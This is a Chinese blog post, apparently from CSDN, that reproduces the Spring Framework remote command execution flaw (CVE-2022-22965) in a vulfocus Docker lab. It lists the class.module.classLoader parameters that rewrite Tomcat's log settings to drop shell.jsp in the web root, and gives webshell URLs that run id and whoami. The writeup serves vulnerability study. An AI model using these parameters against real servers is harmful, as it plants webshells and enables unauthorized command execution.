Spring框架远程命令执行漏洞复现

已于 2022-04-14 10:58:43 修改
阅读量7.1k 收藏 4
点赞数
分类专栏: 漏洞复现 文章标签: 安全
于 2022-04-11 16:54:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangrunmiao_/article/details/124101490
版权

一、漏洞简介

2022年3月31日,国家信息安全漏洞共享平台(CNVD)发布公告预警Spring框架远程命令执行漏洞(CNVD-2022-23942),攻击者利用该漏洞,可在未授权的情况下远程执行命令。

漏洞触发条件如下:

使用JDK9及以上版本的Spring MVC框架

Spring框架以及衍生的框架spring-beans-*.jar文件或者存在

CachedIntrospectionResults.class

漏洞影响版本如下

jdk版本在9及以上的使用了版本低于5.3.18和5.2.20的Spring框架或其衍生框架构建的网站或应用

二、漏洞复现

使用docker搭建SpringCore RCE测试环境

docker pull vulfocus/spring-core-rce-2022-03-29

在8090端口开启spring,环境要基于tomcat

docker run -dit -p 8090:8080 vulfocus/spring-core-rce-2022-03-29

访问8090端口,返回ok,证明启动成功。

开始利用~

(主要是利⽤class对象构造利⽤链,对Tomcat的⽇志配置进行修改,然后,向⽇志中写⼊shell)

具体攻击步骤如下:

先后发送以上5个利用链的请求:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell

class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

成功写入shell文件shell.jsp到网站根目录,如下图所示:

下一步写入webshell到网站根目录,POST数据包如下:

Webshell内容简单的命令执行,密码是t,命令执行内容显示“//”前面

 访问ip:8090/shell.jsp?pwd=t&cmd=id ,ip:8090/shell.jsp?pwd=t&cmd=whoami,成功返回结果。

本次复现借鉴 Spring框架远程命令执行漏洞复现及分析 - FreeBuf网络安全行业门户,请参考~

xiaozhang~
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
Spring Framework远程代码执行漏洞(CVE-2022-22965)
做自己喜欢的事,并将其发挥到极致!
04-07 1448
文章目录声明前言一、漏洞详情二、影响版本三、漏洞四、漏洞原理分析五、修方法(仅供参考) 声明 本文章仅用做漏洞和技术研究,切勿非法渗透攻击,造成一切后果与本作者无关,切记! 前言 Spring Framework存在远程代码执行漏洞,攻击者可通过该漏洞执行系统命令。 一、漏洞详情 Spring Framework 是一个开源应用框架,初衷是为了降低应用程序开发的杂度,具有分层体系结构,允许用户选择组件,同时还为J2EE应用程序开发提供一个好用的框架。 这个漏洞的主要原因是在JDK 9+版本
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
vulfocusSpring Framework 远程命令执行漏洞
woai_zhongguo的博客
07-18 967
vulfocusSpring Framework 远程命令执行漏洞
Spring框架漏洞
Bird&Bird
12-03 2639
目录一、漏洞描述二、影响版本三、环境搭建四、漏洞4.1、漏洞验证4.2、编写POC4.3、执行payload4.4、反弹shell 一、漏洞描述 Spring Security OAuth2是为Spring框架提供安全认证支持的一个模块。当用户使用Whitelabel views来处理错误时,攻击者可以在被授权的情况下通过构造恶意SpEL表达式来远程执行命令。故是在需要知道账号密码的前提下才可以利用该漏洞。 二、影响版本 Spring Security OAuth 2.0 – 2.0.9 Spring
SpringBoot项目中 Spring Framework远程代码执行漏洞的处理方案
最新发布
傲泣龙腾的博客
04-08 1034
公司最近要求对所有项目进行漏洞检测修,其中有一项漏洞名称为Spring Framework远程代码执行漏洞(CVE-2022-22965)需要升级Spring Framework版本解决,如图高危修建议将Spring Framework升级至安全版本 ,即升级5.2.20及以上版本 或 5.3.18及以上版本,具体官方修的5.2和5.3版本可以查找。
(CVE-2022-22965)Spring Framework 远程命令执行漏洞(vulfocus)
qq_40646572的博客
05-11 815
漏洞SpringFramework数据绑定的一个漏洞,如果后台方法中接受的参数为非基础类型,Spring会根据前端传入的请求正文中的参数的key值来查询与其名称所对应的getter和setter方法,攻击者利用这一特性修改了Tomcat的一个用于日志记录的类的属性,进而当Tomcat在进行写日志操作的时候,将攻击者传递的恶意代码写入指定目录的指定文件中。
CVE-2022-22965 Spring Framework远程代码执行漏洞
weixin_45715461的博客
07-11 2867
CVE-2022-22965 Spring Framework远程代码执行漏洞
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞
12-26
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行 0day 漏洞
借助spring自定义命令执行
01-30
Spring项目中,有时因为某些需求,并不想直接调用实际的实例方法(业务分离),或者调用实际的实例方法存在困难,这时候,可以自定义代码执行器来间接的调用执行指定的实例方法,来实业务分离。
spring框架历史漏洞
weixin_54431413的博客
06-23 3415
了vulhub上的spring漏洞,基本上都是由于引用了spEL(spring的表达式语言),造成了未授权的恶意参数注入,表达式注入,spEL表达式解析引起的RCE等问题,。
我滴个乖乖,我Spring漏洞,害怕!
Java后端技术
04-02 244
往期热门文章:1、小学生们在B站讲算法,网友:我只会阿巴阿巴 2、Spring爆出比Log4j2还大的漏洞? 3、Objects.equals 有坑!!! 4、Redis 官方可视化工具,功能真心强大! 5、xxl-job 和 ElasticJob比,谁牛?前天发布了《Spring爆出比Log4j2还大的漏洞?》这篇文章,没想到阅读量居然这么高。这篇文章其实是我那天晚上知...
Spring 框架远程代码执行漏洞(CVE-2022-22965)
panda的博客
04-08 4599
Spring 框架远程代码执行漏洞(CVE-2022-22965)
spring相关漏洞
Shanfenglan's blog
12-30 1179
文章目录1. H2 Database web端未授权访问导致的rce2. Spring Security OAuth2 rce -- CVE-2016-49773. Spring Data Rest 远程命令执行漏洞(CVE-2017-8046)4. Spring Data Commons 远程命令执行漏洞(CVE-2018-1273) 1. H2 Database web端未授权访问导致的rce 2. Spring Security OAuth2 rce – CVE-2016-4977 Spring Se
spring漏洞(cve-2022-22947,cve-2022-22963,cve-2022-22965)
qq_57939909的博客
08-30 1263
spring漏洞
Spring远程代码执行漏洞
Snowflake1997的博客
03-18 6109
首先进入漏洞环境 构造所需漏洞 docker-compose up -d 在浏览器中访问 首先访问http://your-ip:8080/login,用页面左边给出的任意一个账号/密码登录系统: 然后访问id为1的酒店http://your-ip:8080/hotels/1,点击预订按钮“Book Hotel”,填写相关信息后点击“Process”(从这一步,其实WebFlow就正式开始了): 再点击确认“Confirm”: 此时抓包,抓到一个POST数据包,我们向
rmi远程反序列化rce漏洞_Spring框架的反序列化远程代码执行漏洞分析(转)
06-06
Spring框架的反序列化远程代码执行漏洞,则是指攻击者可以通过构造恶意的序列化数据,使得Spring框架在反序列化时执行恶意代码,从而导致远程代码执行漏洞。这个漏洞的影响范围非常广泛,涵盖了Spring框架的多个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值